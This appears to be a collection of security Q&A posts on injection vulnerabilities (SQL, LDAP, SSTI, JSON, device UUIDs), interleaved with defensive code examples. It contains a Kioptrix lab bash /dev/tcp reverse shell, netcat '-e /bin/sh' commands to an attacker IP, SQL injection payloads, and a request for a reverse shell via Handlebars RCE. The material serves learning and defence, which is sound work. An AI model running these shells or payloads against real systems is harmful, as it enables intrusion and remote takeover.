Stop UUID injection in MYSQL Database

I have a Cordova app that logs users in based on their device's model+platform+uuid. For example: Pixel 2Android39798721218. The way this works when a user uses a new device is detailed in the following:

  1. User opens app
  2. App sends uuid code to checking page like: login-uuid?id=(uuid_here)
  3. If the uuid does not exist in the database the user is directed to a login page with the url: login?uuid=(uuid_here)
  4. User logs in and the uuid is sent to the login backend where it gets stored in a database
  5. When the user opens the app again they are logged in because their uuid is in the database

My question is basically: if someone knows a user's login details, they can navigate to login?uuid=foo, and then even if the user changes their password the attacker can still log in by navigating to login-uuid?id=foo. Is there any way to mitigate this, or will simply removing all logged-in devices when a user resets their password be enough?
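A defender-side sketch of the device-login flow, added here as an example (it is not the asker's code and assumes nothing about their backend): the server issues a random token after a password login instead of accepting a client-reported model+platform+uuid string as the credential, stores only a hash of that token, and stamps it with the user's password version so that a password reset invalidates every previously registered device. Python with an in-memory SQLite table; the schema, the user and the device labels are constructed for the example.

```python
import hashlib
import secrets
import sqlite3


def open_db():
    """Constructed in-memory schema: a user table plus one row per registered device."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (
            id INTEGER PRIMARY KEY,
            name TEXT UNIQUE NOT NULL,
            password_version INTEGER NOT NULL DEFAULT 1
        );
        CREATE TABLE device_sessions (
            token_hash TEXT PRIMARY KEY,
            user_id INTEGER NOT NULL REFERENCES users(id),
            device_label TEXT,                  -- e.g. 'Pixel 2 / Android', informational only
            password_version INTEGER NOT NULL,  -- version the token was issued under
            revoked INTEGER NOT NULL DEFAULT 0
        );
    """)
    db.execute("INSERT INTO users (name) VALUES ('alice')")
    return db


def _token_hash(token):
    # Store a hash, not the token: a database leak must not hand out working logins.
    return hashlib.sha256(token.encode()).hexdigest()


def issue_device_token(db, user_id, device_label):
    """Call only after a successful password login. The returned token is what the app
    keeps; the client's own uuid string is never accepted as a credential."""
    token = secrets.token_urlsafe(32)
    (version,) = db.execute(
        "SELECT password_version FROM users WHERE id = ?", (user_id,)).fetchone()
    db.execute(
        "INSERT INTO device_sessions (token_hash, user_id, device_label, password_version) "
        "VALUES (?, ?, ?, ?)",
        (_token_hash(token), user_id, device_label, version))
    return token


def user_for_token(db, token):
    """The login-uuid?id= check: user id for a live token, else None. A token is dead
    if it is unknown, explicitly revoked, or was issued under an older password."""
    row = db.execute(
        "SELECT s.user_id FROM device_sessions s JOIN users u ON u.id = s.user_id "
        "WHERE s.token_hash = ? AND s.revoked = 0 AND s.password_version = u.password_version",
        (_token_hash(token),)).fetchone()
    return row[0] if row else None


def reset_password(db, user_id):
    """Part of the password-reset handler: bumping the version kills every existing token."""
    db.execute("UPDATE users SET password_version = password_version + 1 WHERE id = ?",
               (user_id,))


def revoke_device(db, token):
    """Lets the user sign out a single device from a 'manage devices' page."""
    db.execute("UPDATE device_sessions SET revoked = 1 WHERE token_hash = ?",
               (_token_hash(token),))


if __name__ == "__main__":
    db = open_db()
    t = issue_device_token(db, 1, "Pixel 2 / Android")
    print(user_for_token(db, t))  # 1
    reset_password(db, 1)
    print(user_for_token(db, t))  # None
```

The version stamp answers the question directly: revoking all devices on password reset is enough only if the device credential is something the server issued and can revoke. A value the phone reports about itself cannot be revoked, because the next request will simply report it again.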

Null byte injection using JSON

I'm trying to make a chatroom for my university. It takes the username in JSON and then stores it in an array, then takes it to the DB for keeping logs, but the thing is, that array also has a "status" key, whose value is set to guest by default, but is set to ADMIN if I log in or any member from my team logs in. I know that the idea of storing "status" with the username is bad, but I just started working on the project. I want to confirm whether it is possible to inject a NULL byte via the username field in JSON and add another key with the same name "status" to gain admin privileges?
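Added example, not the asker's code: a handler that parses the request body strictly and builds the log record so that "status" can only ever come from the server's own authentication result. It shows the two checks a practitioner would want here: rejecting a repeated key (Python's json.loads otherwise silently keeps the last value) and rejecting usernames containing NUL or other control characters. The field allowlist and the length bound are assumptions for the example.

```python
import json

# Fields the client is allowed to send; everything else (status included) is server-owned.
ALLOWED_CLIENT_FIELDS = {"username"}


class DuplicateKeyError(ValueError):
    pass


def parse_strict(raw):
    """json.loads keeps the *last* value of a repeated key and says nothing; this hook
    rejects repeats outright. A raw control byte (NUL included) inside a JSON string
    is already a decode error in strict mode, which is the default."""
    def no_duplicates(pairs):
        obj = {}
        for key, value in pairs:
            if key in obj:
                raise DuplicateKeyError(f"duplicate key: {key!r}")
            obj[key] = value
        return obj
    return json.loads(raw, object_pairs_hook=no_duplicates)


def valid_username(name):
    # str only, bounded length, printable characters only (so an escaped \u0000 fails too).
    return isinstance(name, str) and 1 <= len(name) <= 32 and name.isprintable()


def build_record(raw, is_team_member):
    """Builds the row that goes to the log table. 'status' is derived from the server's
    authentication result (is_team_member), never read from the request body."""
    body = parse_strict(raw)
    unknown = set(body) - ALLOWED_CLIENT_FIELDS
    if unknown:
        raise ValueError(f"unexpected fields: {sorted(unknown)}")
    name = body.get("username")
    if not valid_username(name):
        raise ValueError("invalid username")
    return {"username": name, "status": "ADMIN" if is_team_member else "guest"}


if __name__ == "__main__":
    print(build_record('{"username": "alice"}', False))  # {'username': 'alice', 'status': 'guest'}
```

With this shape the answer to "can a second status key get in" is no, not because the parser is clever, but because the record is assembled from a fixed set of server-chosen values and the body is only consulted for the one field it is allowed to carry.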

Having problems with SQL injection with mysqli extension PHP

I am new to SQL injection, and people on Reddit asked me to do the PortSwigger labs, which I did up until the second-order ones. So I am pretty comfortable with the usual SQL injections.

Now I have made a PHP website myself using the mysqli extension instead of mysql. So, for example, a basic query execution looks like:

// mysqli
$result = mysqli_query($conn, $qry);
// instead of
$result = mysql_query($qry);

========================================================================

So I asked others and found out that without proper sanitization or separate query builders, the mysqli extension is as vulnerable as the mysql extension. So, the app I made is too basic. It's just querying the DB and spitting out results. It's that simple. No sanitization is done.

But executing basic payloads like '+or+1=1--+ or anything basic gives me the error:

mysqli_error() expects exactly 1 parameter, 0 given

So I tried a lot and can't get past this error for anything I try. I simply can't execute injections with the mysqli extension. Any help is highly appreciated.

Thank You.

How to exploit LDAP injection?

Burp Suite marked a website I am testing as having a potential LDAP injection vulnerability. It seems that when I put an asterisk in a parameter, e.g. getStuff?id=*, I get a 500 error and Java error output. When I set it to something normal like 123, I get a 200 response (the page is just blank, however). I'm not sure how I can further exploit this; maybe someone knows?
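From the defender's side, the two findings in this report are a filter metacharacter reaching the directory and a stack trace reaching the client. Added example (not the site's code, which the question does not show): the RFC 4515 escaping that turns a caller-supplied value into a literal assertion value, plus the stricter alternative of validating a parameter that is supposed to be numeric before it is used at all. The attribute names `uid` and `employeeNumber` are assumptions for the example.

```python
import re

# RFC 4515 section 3: these characters carry meaning inside a search filter and are
# written as backslash + two hex digits when they come from untrusted input.
_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value):
    """Escapes one assertion value. Each character is mapped independently, so a
    backslash in the input is escaped exactly once."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_lookup_filter(attribute, value):
    """Equality filter for a caller-supplied value, e.g. the id parameter in the question.
    A '*' in the value becomes '\\2a', which matches a literal asterisk, not 'anything'."""
    return f"({attribute}={escape_filter_value(value)})"


_NUMERIC_ID = re.compile(r"^[0-9]{1,10}$")


def build_id_filter(raw_id):
    """Stricter option when the parameter is known to be numeric: validate first, and
    return a 400 to the caller instead of letting the directory produce a 500."""
    if not _NUMERIC_ID.match(raw_id):
        raise ValueError("id must be a decimal number")
    return f"(employeeNumber={raw_id})"  # attribute name assumed for the example


if __name__ == "__main__":
    print(build_lookup_filter("uid", "*"))    # (uid=\2a)
    print(build_id_filter("123"))             # (employeeNumber=123)
```

The 500 with a Java stack trace is worth fixing on its own: map directory errors to a generic error response and log the detail server-side, so probing the parameter does not also reveal framework and class names.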

Kioptrix 2: Why does a netcat reverse shell executed in the web browser via the command injection bug not work?

I've completed the Kioptrix Level 2 challenge via a bash reverse shell.

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

; bash -i >& /dev/tcp/10.10.13.37/4444 0>&1 

My question is: why does the netcat reverse shell executed in the web browser via the command injection bug not work, when it was working just fine via the terminal?

My Setup

Kali - 10.10.13.37
Kioptrix 2 - 10.10.13.254

netcat listener

kali@kali:~$   nc -lp 4444 

I’ve verified tcp port 4444 is open

kali@kali:~$ ss -antp | g 4444
LISTEN 0      1            0.0.0.0:4444         0.0.0.0:*     users:(("nc",pid=3003,fd=3))
kali@kali:~$

The netcat reverse shell executed in the web browser via the command injection bug doesn't work

; nc 10.10.13.37 4444 ; nc 10.10.13.37 4444 -e /bin/sh 

No traffic at all

kali@kali:~$ sudo tcpdump -nni eth0 port 4444
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes

However, when I repeat the same process with netcat executed in the Kioptrix 2 terminal, I am able to get the reverse shell set up on Kali.

[backdoor@kioptrix ~]$   nc 10.10.13.37 4444 -e /bin/sh 

The reverse shell via the terminal works fine

kali@kali:~$ nc -lp 4444
id
uid=502(backdoor) gid=502(backdoor) groups=0(root),10(wheel),500(john),501(harold),502(backdoor)

tcpdump traffic; the last 4 packets were for the id command

kali@kali:~$ sudo tcpdump -nni eth0 port 4444
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
00:58:29.307806 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [S], seq 1943169723, win 5840, options [mss 1460,sackOK,TS val 12217959 ecr 0,nop,wscale 2], length 0
00:58:29.307851 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [S.], seq 869624996, ack 1943169724, win 65160, options [mss 1460,sackOK,TS val 714133810 ecr 12217959,nop,wscale 7], length 0
00:58:29.308412 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 1, win 1460, options [nop,nop,TS val 12217960 ecr 714133810], length 0
00:59:55.154330 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [P.], seq 1:4, ack 1, win 510, options [nop,nop,TS val 714219657 ecr 12217960], length 3
00:59:55.157180 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [.], ack 4, win 1460, options [nop,nop,TS val 12303857 ecr 714219657], length 0
00:59:55.159646 IP 10.10.13.254.32787 > 10.10.13.37.4444: Flags [P.], seq 1:98, ack 4, win 1460, options [nop,nop,TS val 12303859 ecr 714219657], length 97
00:59:55.159656 IP 10.10.13.37.4444 > 10.10.13.254.32787: Flags [.], ack 98, win 510, options [nop,nop,TS val 714219662 ecr 12303859], length 0

Handlebars.js 4.1.1 Server Side Template Injection exploitation – running system commands with a Node.js RCE when require() is not available?

I’m currently reading the following article and trying to exploit the vulnerability (Handlebars.js 4.1.1 Server Side Template Injection):

http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html

Sure enough, the proof of concept code works fine. Specifically, the final snippet from Matias works in my setup. However, after all those context changes, I no longer have access to the require keyword, and therefore I cannot do require('child_process').exec(), because it says require is not defined.

I tried looking for global variables in the current context which might help me, but found nothing.

I also considered copying the whole child_process library’s source code into my payload, but that’s not trivial, since the library uses other libraries and some specific variables, which are not initialized for me (primordials, for example).

In order to continue the assignment, I need to get a reverse shell on the target machine. How can I use the RCE to run system commands/get a reverse shell if I cannot use require()?

In SQL injection, why don't we use OR 1 or OR 2>1 instead of OR 1=1?

I read everywhere regarding SQL injection that if the SQL query is SELECT * FROM table_name where username='xxxxx' AND password ='xxxx' and you want to enter an always-true condition, then you will have to use 'OR 1=1-- and the query will become SELECT * FROM table_name where username=''OR 1=1--' AND password ='xxxx'. The logic behind the SQL query is simple: since OR 1=1 is always true, that is why it has been executed. However, 2>1, 3>2 will always be considered true, so why don't we use the 'OR 2>1 or 'OR 1 expressions in SQL injection?

Unable to exploit SQL injection in the parameter

During my testing I have found a vulnerable parameter in an API (/api/v1/documents/?direction=desc&limit=30&mode=reports&page=1), and the parameter is page=1 at the end. Upon giving a NULL value &page= in the parameter, it returns the following error.

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30, 30) AS `UserDocuments` LEFT OUTER JOIN `tasks` AS `Tasks` ON `UserDocuments' at line 1" 

While if I input ' at the end of the value, page=1', it returns the following error

"Undeclared variable: NaN","sql":"SELECT `UserDocuments`.*, `Tasks`.`id` AS `Tasks.id`, `Tasks`.... 

I have the following questions in my mind; I have tried exploiting it but have been unable to do so. How can I exploit this parameter, as it is returning a syntax error? Also, if it is not exploitable, is it still vulnerable to SQL injection or some other attack?

Please note that it is a GET request and the response is in JSON, while the application is developed in PHP.
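Whatever the exploitability verdict, the two errors quoted above show pagination values being computed from the raw query string and spliced into LIMIT: an empty page yields a negative offset, a quote yields NaN, and both surface as MySQL syntax errors with the query text attached. Added example of the fix a developer would apply (not the application's code, which the question does not show): validate page and limit as bounded integers before doing any arithmetic, then bind LIMIT and OFFSET as parameters. Python with a constructed SQLite table; the defaults and bounds are assumptions.

```python
import re
import sqlite3

DEFAULT_LIMIT = 30
MAX_LIMIT = 100
MAX_PAGE = 1_000_000

_DECIMAL = re.compile(r"^[0-9]+$")


def parse_count(raw, default, maximum):
    """Turns a query-string value into a bounded positive int or raises ValueError.
    '' and a missing value fall back to the default; anything non-numeric ("1'", "-1",
    "NaN") is rejected before arithmetic, so nothing odd can reach LIMIT/OFFSET."""
    if raw is None or raw == "":
        return default
    if not _DECIMAL.match(raw):
        raise ValueError(f"not a positive integer: {raw!r}")
    n = int(raw)
    if not 1 <= n <= maximum:
        raise ValueError(f"out of range: {n}")
    return n


def open_db(n_docs):
    """Constructed document table with ids 1..n_docs."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE documents (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO documents VALUES (?, ?)",
                   [(i, f"doc {i}") for i in range(1, n_docs + 1)])
    return db


def list_documents(db, page_raw, limit_raw):
    """Handler for the documents endpoint: validated page/limit, offset computed only
    from values that passed validation, both bound as parameters rather than formatted in."""
    page = parse_count(page_raw, 1, MAX_PAGE)
    limit = parse_count(limit_raw, DEFAULT_LIMIT, MAX_LIMIT)
    offset = (page - 1) * limit
    rows = db.execute("SELECT id FROM documents ORDER BY id LIMIT ? OFFSET ?",
                      (limit, offset)).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = open_db(50)
    print(list_documents(db, "2", "30"))  # [31, ..., 50]
```

A ValueError here should become a 400 with a generic message; the application in the question currently answers with the failing SQL text, which is a second finding independent of whether the parameter can be exploited further.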

What does the last single quote of the SQL injection query ' or "1"="1" ' mean?

I couldn't fully grasp why the last single quote of the SQL query ' or "1"="1" ' is necessary. So I understand the part up to the last single quote '. The first single quote enables injecting the SQL, and the or "1"="1" part makes the query always return true. However, I don't understand why the last single quote is necessary to inject the SQL.
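Three of the questions on this page (the mysqli one, the OR 2>1 one and this last-quote one) come down to the same mechanism, so one added example serves all three. It is not code from any of the posts: a login query built by string concatenation next to the same query with bound parameters, using Python's sqlite3 as a stand-in for mysqli_prepare()/bind_param(). The concatenating version returns the SQL text it actually ran, which makes visible where the input's quotes land and why a dangling quote has to be balanced; the parameterised version shows that once the value is bound after parsing, the choice of tautology (1=1, 2>1 or anything else) no longer matters because the input can only ever be a string value. (In PHP, mysqli_error() takes the connection as its argument, which is what the error message in the mysqli post is complaining about.)

```python
import sqlite3


def open_db():
    """Constructed table with one account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    return db


def login_concat(db, username, password):
    """The pattern from the mysqli question: query text assembled from the request.
    Returns the SQL actually sent as well as the rows, so the effect of each quote
    in the input is visible. Here for contrast only."""
    sql = (f"SELECT username FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    return sql, [row[0] for row in db.execute(sql)]


def login_param(db, username, password):
    """mysqli_prepare()/bind_param() equivalent: the statement is parsed with
    placeholders first and the values are attached afterwards, so the text of the
    input cannot change the query's structure."""
    rows = db.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password)).fetchall()
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = open_db()
    sql, rows = login_concat(db, "' OR 1=1--", "anything")
    print(sql)   # ...WHERE username='' OR 1=1--' AND password='anything'
    print(rows)  # ['alice']
    print(login_param(db, "' OR 1=1--", "anything"))  # []
```

Reading the printed SQL answers the last-quote question: the application template supplies an opening and a closing quote around the value, so an injected opening quote leaves the template's closing quote unpaired, and the payload has to either comment it out (the `--` form from the OR 1=1 post) or supply its own quote to pair with it (the trailing quote in the ' or "1"="1" ' form). With binding there is no template quote to pair or comment, which is the fix for all three posts.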